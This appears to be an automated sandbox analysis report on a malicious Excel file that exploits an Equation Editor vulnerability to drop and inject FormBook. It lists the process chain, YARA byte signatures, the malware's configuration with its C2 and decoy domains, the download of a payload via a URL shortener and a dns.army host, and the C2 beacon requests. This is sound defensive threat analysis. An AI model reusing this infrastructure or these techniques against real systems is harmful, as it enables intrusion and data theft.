Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report QTN3C2AF414EDF9_041873.xlsx

Overview

General Information

Sample Name:QTN3C2AF414EDF9_041873.xlsx
Analysis ID:356571
MD5:1b862193e621b4d67be94a2ec44fbf50
SHA1:0bab9195da974524c969404430f6a58b31303322
SHA256:709ae19031f48115d89fb3aeae68476aac8b17a1e97700c6beff820b7c54b8aa
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Connects to a URL shortener service
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 260 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
      • vbc.exe (PID: 2876 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2915C0AFB0B6B26A5A699965D2119F7A)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • ipconfig.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: CABB20E171770FF64614A54C1F31C033)
            • cmd.exe (PID: 2952 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.2900000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.2900000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.2900000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 54.67.57.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2296, TargetFilename: C:\Users\Public\vbc.exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2296, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 260

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.856380692.xyz/nsag/"], "decoy": ["usopencoverage.com", "5bo5j.com", "deliveryourvote.com", "bestbuycarpethd.com", "worldsourcecloud.com", "glowtheblog.com", "translations.tools", "ithacapella.com", "machinerysubway.com", "aashlokhospitals.com", "athara-kiano.com", "anabittencourt.com", "hakimkhawatmi.com", "fashionwatchesstore.com", "krishnagiri.info", "tencenttexts.com", "kodairo.com", "ouitum.club", "robertbeauford.net", "polling.asia", "evoslancete.com", "4676sabalkey.com", "chechadskeitaro.com", "babyhopeful.com", "11376.xyz", "oryanomer.com", "jyxxfy.com", "scanourworld.com", "thevistadrinksco.com", "meow-cafe.com", "xfixpros.com", "botaniquecouture.com", "bkhlep.xyz", "mauriciozarate.com", "icepolo.com", "siyezim.com", "myfeezinc.com", "nooshone.com", "wholesalerbargains.com", "winabeel.com", "frankfrango.com", "patientsbooking.info", "ineedahealer.com", "thefamilyorchard.net", "clericallyco.com", "overseaexpert.com", "bukaino.net", "womens-secrets.love", "skinjunkie.site", "dccheavydutydiv.net", "explorerthecity.com", "droneserviceshouston.com", "creationsbyjamie.com", "profirma-nachfolge.com", "oasisbracelet.com", "maurobenetti.com", "mecs.club", "mistressofherdivinity.com", "vooronsland.com", "navia.world", "commagx4.info", "caresring.com", "yourstrivingforexcellence.com", "alpinevalleytimeshares.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]ReversingLabs: Detection: 36%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 36%
          Multi AV Scanner detection for submitted fileShow sources
          Source: QTN3C2AF414EDF9_041873.xlsxVirustotal: Detection: 33%Perma Link
          Source: QTN3C2AF414EDF9_041873.xlsxReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]Joe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.2900000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A15
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004065C1 FindFirstFileA,FindClose,4_2_004065C1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi5_2_00415843
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_2_00406A95
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_004162BB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00415675
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_1_004162BB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_1_00415675
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi5_1_00415843
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_1_00406A95
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi7_2_000962BB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi7_2_00095675
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi7_2_00095843
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx7_2_00086A95
          Source: global trafficDNS query: name: ow.ly
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.67.57.56:80

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.856380692.xyz/nsag/
          Connects to a URL shortener serviceShow sources
          Source: unknownDNS query: name: ow.ly
          Source: unknownDNS query: name: ow.ly
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 09:26:00 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 23 Feb 2021 07:55:07 GMTETag: "35218-5bbfc3ca9d9e8"Accept-Ranges: bytesContent-Length: 217624Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1Host: www.fashionwatchesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1Host: www.athara-kiano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1Host: www.overseaexpert.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.140.251.164 103.140.251.164
          Source: Joe Sandbox ViewIP Address: 54.67.57.56 54.67.57.56
          Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
          Source: global trafficHTTP traffic detected: GET /omCE30rxT5x HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: algreenstdykeghestqw.dns.army
          Source: C:\Windows\explorer.exeCode function: 6_2_0293C302 getaddrinfo,setsockopt,recv,6_2_0293C302
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /omCE30rxT5x HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /receipat/winlog.exe?platform=hootsuite HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: algreenstdykeghestqw.dns.army
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1Host: www.fashionwatchesstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g HTTP/1.1Host: www.athara-kiano.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nsag/?SFN=toXeTgYrlJ3t8R2kv84tVNAusZG5KBfjoz4tCiNIzgm9lAElLlwfiIUD/nI/OmI1vpPL+Q==&cBb=LtD0g HTTP/1.1Host: www.overseaexpert.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
